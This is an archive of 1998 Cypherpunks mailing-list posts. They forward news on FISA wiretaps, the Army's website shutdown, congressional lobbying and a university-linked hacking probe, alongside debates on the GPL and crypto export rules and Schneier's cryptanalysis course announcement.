   "The Clinton Syndrome," published by Prima Publishing of
Rocklin, Calif., is available in bookstores nationwide. For more
information or to schedule an interview with Dr. Jerome D. Levin or
a Prima spokesman, please call Ciana Banister at 800-536-5920.

 -0-
 /U.S. Newswire  202-347-2770/
 09/29 15:06

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:41:09 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Attn Should Turn to 'Buying of Congress'
Message-ID: <199809302133.OAA25698@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Attn Should Turn to 'Buying of Congress'
Date: Wed, 30 Sep 1998 09:17:32 -0500
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0929-125.txt

Author: Attention Should Turn to 'Buying of Congress' 
U.S. Newswire
29 Sep 14:54

 Nation's Attention Should Turn to 'Buying of Congress' Says Author
Charles Lewis
 To: National and Assignment Desks
 Contact: Marie Elena Martinez of Avon Books, 212-261-6903

   News Advisory:

   "America's citizens have been so distracted by the barrage of
commentary, testimony and endless supposition about the President
Clinton/Monica Lewinsky saga that Capitol Hill lawmakers have had a
reprieve from even the limited amount of scrutiny that normally
surrounds their activities," says Charles Lewis, whose THE BUYING OF
THE CONGRESS: How Special Interests Have Stolen Your Right to Life,
Liberty and the Pursuit of Happiness, written with The Center For
Public Integrity, has just been published.  He points out that while
the nation focuses on whether or not President Clinton should be
impeached, no one is scrutinizing the acts of grand larceny committed
by Congress every day.

   "The attention being paid to the current scandal means that
nobody's minding the store, and the store -- Congress -- needs
minding," says Lewis pointing to the ever-increasing influence of
big-money special interests and the impact this has on people's
lives every single day.  Just a few of the detrimental results
of Congress's love affair with special interests, as detailed
in THE BUYING OF THE CONGRESS, are: little or no action on Social
Security, the continued threat to life from e-coli contamination
and other poisoned foods, the loss of full health benefits,
the number of people who must hold two jobs to make ends meet,
the enormous drop in the percentage of federal tax revenue paid
by corporations, and low voter turnout.  "We've found that members
of Congress moonlight for themselves and their wealthy patrons
more than they work for us," says Lewis who then enumerates
"employers" as varied as Lockheed-Martin, Ameritech, the National
Right to Life PAC, and the National Rifle Association.

   Among the people who are most vocal in their condemnation of
President Clinton during this tumultuous time are several whose
career patrons are publicly identified for the first time in THE
BUYING OF THE CONGRESS, including Speaker of the House Newt Gingrich
(R-GA), and Minority Leader Dick Gephardt (D-MO).

   "With the elections just six weeks away, we can't afford to
overlook Congress's own misdeeds," says Lewis.

    ------
   FOR INTERVIEWS OR ADDITIONAL INFORMATION CONTACT: Marie Elena
Martinez, 212/261-6903

 -0-
 /U.S. Newswire  202-347-2770/
 09/29 14:54

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:38:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Army goes offline in reaction to Pentagon order
Message-ID: <199809302133.OAA25709@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Army goes offline in reaction to Pentagon order
Date: Wed, 30 Sep 1998 10:24:30 -0500
To: believer@telepath.com

Source:  Federal Computer Week
http://www.fcw.com/pubs/fcw/1998/0928/web-army-9-28-98.html

----------
SEPTEMBER 28, 1998 . . . 11:50 EDT 
----------

Army goes offline in reaction to Pentagon order

BY BOB BREWIN (antenna@fcw.com)

The Army slammed shut its door to the wired world last week, closing down
all its World Wide Web sites in reaction to a new Pentagon Web security
policy.

Only the Army had such a drastic response to a Defense Department memo
issued last week that spelled out what information DOD Web sites should and
should not post. The Air Force, the Navy and the Marine Corps still offer
the public access to popular and highly visible Web pages.

The Army's move is in reaction to Deputy Secretary of Defense John Hamre's
policy memo released Sept. 17, which directed all military organizations
that maintain Web sites to review and then remove sensitive information
that could aid potential enemies of the United States. Hamre said some Web
sites in the past have provided "too much detail on DOD capabilities,
infrastructure and operational capabilities.'' Hamre said this new policy
will help DOD to "strike a balance between openness and sound security.''

The Army, according to an internal message furnished to FCW, responded by
directing all commanders to ensure that "all of their publicly accessible
Web sites are immediately disconnected from the Internet.''

Lt. Gen. William Campbell, the Army's director of information systems for
command, control, communications and computers, sent the message at 5 p.m.
Friday. He added that the shutdown could be accomplished by physically
disconnecting Web servers from the public network, moving all Web site
files from public to nonpublic servers or instituting control mechanisms
that prohibit public access.

The internal Army message also suggested that commands deal with frustrated
users trying to access Army Web sites by posting a new "cover page'' (in
use on many Army Web pages, including the main site at www.army.mil) that
reads: "This Army Web site is not currently available. This Web site will
be available again after maintenance is completed.''

The Web shutdown caught the public affairs staff at the Department of the
Army's headquarters in the Pentagon by surprise. An Army spokesman was
unable to offer any explanation for the move or any indication of when the
sites would be operating again.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:38:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Secret Courts Approve More Wiretapping
Message-ID: <199809302133.OAA25720@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Secret Courts Approve More Wiretapping
Date: Wed, 30 Sep 1998 10:50:51 -0500
To: believer@telepath.com

Source:  Excerpted from:
----------------------------------

From: "John C. Goodman- National Center for Policy Analysis" <ncpa@onramp.net>

National Center for Policy Analysis
DAILY POLICY DIGEST
Wednesday, September 30, 1998

<snip>

SECRET COURTS APPROVE MORE WIRETAPPING

Judges in secret federal courts are authorizing unprecedented 
numbers of wiretaps and clandestine searches, according to U.S. 
Department of Justice records.  The courts were authorized by the 
1978 Foreign Intelligence Surveillance Act (FISA).

   o   During the last three years, an annual average of 760 
       wiretaps and searches were carried out -- a 38 percent 
       increase from the 550 a year average for 1990 to 1994.

   o   Since 1995, FISA courts also have authorized searches of 
       the homes, cars, computers and other property of suspected 
       spies.

   o   In all, the courts have approved 11,950 applications and 
       turned down one request.

Proponents argue the surveillance reflects a stepped-up federal 
response to increased terrorist activity on American soil.  But 
opponents contend that the process endangers the very liberties 
it seeks to protect.  "There's a growing addiction to the use of 
secret courts as an alternative to more conventional 
investigative means," points out Jonathan Turley, a law professor 
at George Washington University.

The law requires the Justice Department -- and usually the FBI or 
the National Security Agency -- to show the judge that the target 
is a foreign government or agent engaging in "clandestine 
intelligence gathering activities" or terrorism.

Source: Richard Willing, "With Secret Courts' OK, Wiretapping on 
the Rise," and "Secrecy Might Be Weak Link in Taps of Suspected 
Spies," both USA Today, September 30, 1998. 

For more on Terrorism http://www.ncpa.org/pi/congress/cong9.html

****************************************************************************
                    NATIONAL CENTER FOR POLICY ANALYSIS
                               DALLAS, TEXAS

                      "Making Ideas Change the World"

                             Internet Address:
                            http://www.ncpa.org
****************************************************************************


-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:41:17 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Secrecy might be weak link in wiretaps
Message-ID: <199809302133.OAA25731@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Secrecy might be weak link in wiretaps
Date: Wed, 30 Sep 1998 10:57:09 -0500
To: believer@telepath.com

Source:  USA Today
http://www.usatoday.com/news/nds1.htm

09/29/98- Updated 11:55 PM ET
 The Nation's Homepage

Secrecy might be weak link in wiretaps

 ALEXANDRIA, Va. - Intelligence officials increasingly rely on
 wiretaps authorized by a secret federal court to keep track of foreign
 spies and potential terrorists. 

 But an espionage trial set to begin in federal court here next Tuesday
 highlights what even the secret court's supporters admit is its weakness:
 The court's secrecy can make it very difficult for defendants caught on
 the wiretaps to defend themselves. 

 "If my client had been wiretapped based on (an ordinary federal)
 warrant, you can bet I'd be all over it," says Richard Sauber, a
 Washington, D.C., lawyer defending accused spy Kurt Stand. 

 "But this isn't an ordinary warrant. Under law I can't find out what the
 wiretap was based on, whether the information was flawed, whether
 the judge was correct to authorize it. There's a fundamental issue of
 fairness here," Sauber says. 

 Ironically, fairness was cited as the issue in 1978, when the Foreign
 Intelligence Surveillance Act (FISA) created a special secret court for
 authorizing wiretaps on suspected spies. 

 The FISA court was created by Congress as a check against the
 power of presidents, who until then had authorized wiretaps and
 warrantless searches on their own say so in the interest of national
 security. 

 The law requires the Justice Department, and usually the FBI or the
 National Security Agency, to show a judge that the target is a foreign
 government or agent engaging in "clandestine intelligence gathering
 activities" or terrorism. "The spirit of the thing is to hold the (wiretap
 requests) to a high legal standard," says William Webster, director of
 the FBI when FISA was passed. "That's a large departure from the
 way things had been done." 

 Now, investigators prepare a written request and run it by Justice
 Department lawyers. Justice certifies that the tap's primary purpose is
 to gather intelligence, though information gleaned can be used in
 criminal cases. 

 The request then is presented to one of seven FISA judges, who are
 U.S. district court judges appointed by the chief justice to authorize
 intelligence wiretaps. Many of the requests are heard in a soundproof
 sixth-floor conference room in the Justice Department's main
 headquarters. 

 The target of the search is not represented. 

 Says David Banisar, researcher for the Electronic Privacy Information
 Center: "There are mistakes made in ordinary warrant processes, from
 getting the wrong address to not having probable cause, and they can
 be corrected when lawyers attack the warrant. " 

 "That can't happen here," he says. "We'll never know how many
 mistakes are made because the (secret) court's proceeding isn't public."

 By Richard Willing, USA TODAY

(c)COPYRIGHT 1998 USA TODAY, a division of Gannett Co. Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:39:16 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Courts OK record number of wiretaps
Message-ID: <199809302133.OAA25743@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Courts OK record number of wiretaps
Date: Wed, 30 Sep 1998 10:55:30 -0500
To: believer@telepath.com

Source:  USA Today
http://www.usatoday.com/news/washdc/ncs2.htm

09/30/98- Updated 12:06 AM ET
 The Nation's Homepage

Courts OK record number of wiretaps

 WASHINGTON - Federal judges operating in secret courts are
 authorizing unprecedented numbers of wiretaps and clandestine
 searches aimed at spies and terrorists operating in the USA, Justice
 Department records show. 

 During the last three years, an average of 760 wiretaps and searches a
 year were carried out, a 38% increase from the 550 a year from 1990
 to 1994. 

 Federal judges have authorized a yearly average of 463 ordinary
 wiretaps since 1990 in drug, organized crime and other criminal cases. 

 Part of the growth in surveillance is attributed to an increase in
 espionage and terrorist activities in the USA. 

 "There's a greater quantity of the folks who are potentially problematic
 out there," says Jamie Gorelick, who as deputy attorney general from
 1994 to 1997 helped review wiretap applications. 

 Proponents say the surveillance reflects a stepped-up federal response
 to increased terrorist activity on American soil. 

 Opponents argue that the process endangers the very liberties it seeks
 to protect. 

 "This issue is where the rubber hits the road," says William Webster,
 who headed the FBI in 1978 when the law allowing the secret wiretaps
 was passed. "It's where we try to balance the concept of our liberty
 against what has to be done to protect it." 

 The wiretaps, which are applied for by the Justice Department under
 the Foreign Intelligence Surveillance Act (FISA) and carried out by the
 FBI and National Security Agency, have received their greatest use yet
 under President Clinton and Attorney General Janet Reno. 

 Since 1995, FISA courts also have authorized searches of the homes,
 cars, computers and other property of suspected spies. In its two
 decades, FISA courts have approved 11,950 applications and turned
 down one request. 

 Generally, defense lawyers can challenge the basis for authorizing a
 wiretap. But supporting information for wiretaps authorized by the
 FISA court are sealed for national security reasons. 

 "It legitimizes what would appear to be contrary to constitutional
 protections," says Steven Aftergood, privacy specialist at the
 Federation of American Scientists. "It's a challenge to the foundation of
 American liberties." 

 Opponents also say the government is using the wiretaps to replace
 conventional criminal searches which must meet a higher legal standard.

 "There's a growing addiction to the use of the secret court as an
 alternative to more conventional investigative means," says Jonathan
 Turley, law professor at George Washington University in Washington,
 D.C. 

 The wiretaps are meant to develop intelligence, not to help make
 criminal cases. But the wiretap information was used to secure guilty
 pleas from CIA turncoats Aldrich Ames in 1994 and Harold Nicolson
 in 1997. 

 By Richard Willing, USA TODAY

(c)COPYRIGHT 1998 USA TODAY, a division of Gannett Co. Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:38:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Innovative Approach to Biometric ID Authentication
Message-ID: <199809302133.OAA25759@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Innovative Approach to Biometric ID Authentication
Date: Wed, 30 Sep 1998 11:16:35 -0500
To: believer@telepath.com

Source:  PR Newswire
http://www.prnewswire.com/

DEL-ID... AN UNUSUAL AND INNOVATIVE APPROACH TO ID AUTHENTICATION 

    MONTREAL, Sept. 28 /CNW-PRN/ - The market for ID authentication
products that use biometric technologies is experiencing strong growth. The
dominant technology at the moment uses finger prints (or, to be exact,
finger print details, such as bifurcations or ridge endings). The reason is
simple.  It has long been accepted that finger prints are unique to each
individual; this assumption is backed by probability analyses confirming
that the theoretical probability of finding similar finger-print detail
configurations in two different individuals is about 10(-20) (that is,
about one chance in a billion billion).  In practice, however, measuring
errors can occur when processing finger-print images, increasing the
probability of error to about one in a
thousand for top-quality commercial systems.

    There are weaknesses in the existing approach, however. For example,
privacy cannot be guaranteed when a digital finger print is used for ID
authentication and large pieces of equipment are required.  For these
reasons, other options must be considered. The del-ID solution proposed by
delSecur is an original and attractive approach. 

    The delSecur system processes finger-print image data analogically, not
digitally, creating an abstract image of the characteristics of the human
finger.  The video signal from the reader that captures the finger image is
analogically processed.  To register with the del-ID authentication system,
you place your finger over the reader (without touching it, so you don't
leave finger prints on it) and an abstract image of your finger print is
stored. This becomes your personal electronic signature.  When someone
claiming to be you places his finger over the reader, a new abstract image
is generated and authenticated by comparison with the stored image; a
comparison matrix developed by delSecur is used to determine the similarity
of the two images. The matrix, patented by delSecur, comes from the field
of photography and may be combined with other metric matrices developed by
CRIM or borrowed from other existing technologies.

    The delSecur concept is original. It is different from conventional
approaches and its architecture is unusually simple.  What distinguishes
the delSecur concept is the representation of the finger image and the
technology that allows this representation to be used for authentication.
delSecur uses a patented process to create an abstract image that contains
data unique to an individual. delSecur not only built a device to
demonstrate the potential of the concept but also developed a preliminary
architecture for the registration and authentication prototype, making it
possible to analyze the concept--the maximum rotation angle for feasibility
and authentication, for example. 

    Given the encouraging results of the scientific evaluation of the basic
concept of the del-ID system, delSecur, in partnership with CRIM and other
firms, is planning to begin a case study and pilot projects with large
Canadian and international firms to clarify and test technical details.
The ultimate goal is implementation of a wide variety of applications on a
very large scale.

    The del-ID system is marketed by delSecur, a Canadian company wholly
owned by Grandeur Inc., a firm listed on the New York stock exchange. 
    NASDAQ: GDER

(c)1998 PR Newswire. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:39:51 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Navy investigating GSU computer hacker
Message-ID: <199809302133.OAA25787@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Navy investigating GSU computer hacker
Date: Wed, 30 Sep 1998 12:42:56 -0500
To: believer@telepath.com

Source:  Savannah Morning News
http://www.savannahmorningnews.com/smn/stories/093098/LOCgsuhacker.html

U.S. Navy investigating GSU computer hacker 

University computer was used to break into a government
computer.

By Jenel Williams Few
Savannah Morning News

Someone used a Georgia Southern University writing and linguistics
department classroom computer to break into government files and the
U.S. Navy wants to know why.

The Naval Criminal Investigation Office is looking into a computer
hacking case at Georgia Southern University, according to Bryan
Stamper, special agent in charge at the Jacksonville, Fla., office.

John Glacier, assistant director for technical support at Georgia
Southern, said the school was recently asked to find out which of its
computers was used to access computer files from a government
agency.

"We believe it was from our model classroom during a scheduled
classtime," Glacier said.

He tracked the school's computer records and discovered that someone
used a computer in the writing and linguistics department's model
classroom to hack into a government computer while a class was in
session.

"They ran a file transfer protocol program, which allows you to
download files and gain access to someone else's computer," Glacier
said.

Details about the Navy's investigation will be made available at a later
date.

Computer hacking can carry serious federal penalties, according to
Federal Bureau of Investigations Special Agent William Kirkconnell. An
innocent infiltration may not merit any punishment, but using a computer
to steal classified government information could be considered
espionage, he said.

"It depends on what agency was affected, whether it was done
maliciously and whether the information was used for criminal
purposes," he said.

Glacier said he does not know who used the campus computer to break
into government files or how much information was accessed.

"They wouldn't say if files were downloaded or uploaded," Glacier said,
referring to bringing information into the GSU computer or taking
information from the GSU computer and sending it to another one.
"They haven't questioned any students."

Although he doesn't know the culprit's motivation, Glacier said these
types of incidents often occur among bright, curious students.

"College-age students want to apply the knowledge they have gained
about computers," he said. "What they've learned in high school and
college intuitively generates curiosity and they want a challenge."

Last year, in a similar incident, Glacier said a hacker tried to hide some
computer mischief by calling a Georgia Southern computer and linking
up to computers from the Philippines to the Midwest before breaking
into government files.

"It alarms me that we would be used that way, but it occurs around the
world and it's not too hard to use computers this way," Glacier said.

Higher education reporter Jenel Williams Few can be reached at
652-0325.

Web posted Wednesday, September 30, 1998
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:49:40 +0800
To: cypherpunks@cyberpass.net
Subject: [FP] FW: NID Repeal Possible
Message-ID: <199809302150.OAA27187@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] FW: NID Repeal Possible
Date: Tue, 29 Sep 1998 20:59:21 -0500
To: "Scan This News Recipients List" <scan@efga.org>

======================================================================
SCAN THIS NEWS
9/29/98

[Forwarded message follows]
=======================================================================
-----Original Message-----
From: Patrick Poole
Sent: Tuesday, September 29, 1998
To: 'iRESIST'; 'Scott McDonald'
Subject: NID Repeal Possible


A source inside Dick Armey's office today said that it is probable
that there will be a national ID repeal provision in the Omnibus
appropriations bill this year. We need to continue to "remind" the
House leadership (Gingrich, Armey, DeLay) that this is a non-negotiable
issue over the next week. Armey and DeLay are friends of ours on this
issue, but Gingrich will do only what the political winds tell him.

Patrick Poole
Free Congress Foundation
Patrick S. Poole, Deputy Director
(mailto:ppoole@fcref.org)
phone: 202-546-3000
fax: 202-544-2819
http://www.freecongress.org/

[End of forwarded message]
=======================================================================
[Good link to contact your congress-critters:]
http://www.visi.com/juan/congress/
=======================================================================
Call your Congress person every day toll-free!

[Haven't checked these numbers to see if they are still good.]

You may phone the U. S. Capitol switchboard at any of the following
numbers, when they answer, ask for your Senator or Representative's office.
If you don't know the name of your Senator or Representative, tell the
operator where you live and she will connect you to the proper office. 
(800)972-3524
(800)522-6721
(888)723-5246

=======================================================================
[Here's another number:]

The Unions have set up a toll-free number so individuals can call
Congress. If you have to call a congressional office, use the following
number: 1-888-723-5246. Each phone call may cost the unions between
$4.00-$10.00. Use it if you're on the hill or off the hill. Give the
number to 15 of your closest friends and have them call their
congressman's office just to say "hi". Calling this number puts you
directly through to the congressional operator.

[Haven't checked it either.]

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: support@golive.com
Date: Wed, 30 Sep 1998 17:20:43 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio Trial Activation Key
Message-ID: <199809302211.PAA06186@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for trying out GoLive CyberStudio.

Your official 30-day activation key is: MWT4QWF7F8WP7GJJ

You'll need to enter this key when you first start-up the
software.

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1580.

Sincerely,

Maria Jeronimo
Operations Coordinator
GoLive Systems, Inc.
customercare@golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 30 Sep 1998 17:27:36 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284710@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Petro wrote:
> >> Had Microsoft, for example, been required to publish their
> >> API's by the market we wouldn't be spending all this effort
>    ^^^^^^^^^^^^^^^^^^^
> 
> >You state free-market and then you are *requiring* someone to 
> >do something? How do you resolve that contradiction? Require 
> >= Force != Free[dom]
> 
> Required as in purchasers large and small saying "You 
> don't include your source code, we won't buy it".

*Require* per say is a bad term for the use of economic power. But the
market didn't "require" Microsoft to do so (see Microsoft's financial
statements), so why should the government step in and force something
that is contrary to the market?

The rest of Jim's sentence read "we wouldn't be spending all this effort
and money on the current [Department of Justice] proceedings."

Which tells me that require means certain segments of the market telling
Microsoft you will do this or we will fuck you over with the borrowcrats
we own, which is exactly what has happened. The elements lacked
sufficient economic power to sway Microsoft, and they lacked sufficient
political power until they ganged up together. A loose coalition to gain
via use of DOJ antitrust force what they good not gain in a free market.
That is political power, not economic.
What is rather ironic is that the same Antitrust laws they are trying to
bash Microsoft with are what prevented them from forming an economic
(instead of under-the-table political) coalition that could have made
Microsoft change its practices without resorting to non-free-market
forces.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bram <bram@gawth.com>
Date: Wed, 30 Sep 1998 17:08:22 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809301621.KAA09089@wijiji.santafe.edu>
Message-ID: <Pine.LNX.3.96.980930151900.32067A-100000@blackbox>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 30 Sep 1998, Richard Stallman wrote:

> It isn't surprising that people who want to write non-free software
> are disappointed that the GNU project won't help them.  What is
> amazing is that they feel this is unfair.  They have no intention of
> letting me use their source code in my programs--so why should they be
> entitled to use my source code in their programs?  These people seem
> to think that their selfishness entitles them to special treatment.

I've never heard anyone say it's unfair, I've just heard people claim that
there's benefit they could be getting which is prohibited by it. This
generally translates into benefit which is denied their clients as well,
in addition to people who interact with their clients. I for one don't
much care if code I write makes someone money in addition to doing some
good, I just want it to be beneficial.

Basic physical necessities, as well as business mechanisms, unfortunately
make it impossible for all code I write to be distributed without some
mechanism by which I could make money off of it. That doesn't mean my code
is evil, just that I'm not independently wealthy.

(Incidentally, the code I'm working on right now will probably wind up
being free, with a considerably looser license than GPL.)

-Bram




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 30 Sep 1998 16:21:07 +0800
To: Bruce Schneier <cypherpunks@toad.com
Subject: Re: Announcement: A Self-Study Course in Block CipherCryptanalysis
In-Reply-To: <199809301907.OAA15179@mixer.visi.com>
Message-ID: <v04011703b238488e5706@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:02 PM -0500 9/30/98, Bruce Schneier wrote:
>Ever since writing Applied Cryptography, I have been asked to recommend a
>book on cryptanalysis.  My unfortunate answer is that while there are
>several good books on cryptography, there are no books, good or bad, on
>cryptanalysis.
...

>To help in getting this experience, I designed a self-study course in
>block-cipher cryptanalysis.  With it, a student can follow an ordered path
>through the academic literature and emerge out the other side fully capable
>of breaking new algorithms and publishing new cryptanalytic results.

...

>The paper is available in both postscript and pdf formats at:
>
>	http://www.counterpane.com/self-study.html
>
>Comments are always appreciated.

	Thanks.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 30 Sep 1998 16:03:09 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199809302058.PAA13319@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
> From: Derek Atkins <warlord@MIT.EDU>
> Date: 30 Sep 1998 16:02:23 -0400

> The big issue I see with GPL and Crypto software is that with the GPL
> you cannot add any redistribution restrictions.  The problem is that
> due to the United States export rules, I cannot export Crypto
> software, which means I must legally put a restriction on any Crypto
> code I write.  But, this is a "further restriction" as far as the
> GPL is concerned.  This, in turn, means I cannot use the GPL for
> Crypto software.

A legal prohibition isn't a licensing restriction, it's a distribution
restriction. A license restriction defines who can use a product and
under what terms they may do so legaly, it doesn't address where they
may use it legaly.

If you tried to put a license restriction that said "can only be used in
the US" *then* you would be correct. It isn't the copyright holders choice
and therefore they're not responsible for it per se. Not to mention that
it would be very hard to support legaly.

A good example is I have a military book that says that you can only
possess the book in the US and Canada...try to enforce that one.

Were that the case Phil Z. would be sittin in a hoosgow right now.

Personaly, I like the idea of printing your source out and sending it to
HackTick for typing in and reposting. That wouldn't effect your initial
licensing restrictions and bypasses the restrictions handily.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
